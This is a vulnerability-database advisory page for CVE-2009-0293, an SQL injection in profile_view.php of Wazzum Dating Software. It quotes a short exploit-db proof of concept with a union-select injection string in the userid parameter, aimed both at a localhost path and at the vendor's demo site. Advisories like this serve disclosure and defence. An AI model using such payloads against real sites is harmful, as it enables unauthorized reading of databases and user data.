Recent Vulnerabilities Research Posts Trends Blog About Contact

Published: 27/01/2009 Updated: 29/09/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

SQL injection vulnerability in profile_view.php in Wazzum Dating Software, possibly 2.0, allows remote malicious users to execute arbitrary SQL commands via the userid parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
wazzum wazzum dating software _nil_

#Wazzum Dating Software (userid) SQL Injection Vulnerability #Author: nuclear #site: wwwwazzumcom/ #vuln: localhost/[path]/profile_viewphp?userid=-1 union select 1,2,3,4,5,@@version /* #demo: wwwwazzumcom/dating_demo/profile_viewphp?userid=-1%20union%20select%201,2,3,4,5,@@version%20/* #greetz Mi4night, zYzTeM, ...

CWE-89 http://secunia.com/advisories/33654 http://www.securityfocus.com/bid/33461 http://osvdb.org/51625 https://www.exploit-db.com/exploits/7877 https://nvd.nist.gov https://www.exploit-db.com/exploits/7877/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2009-0293

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect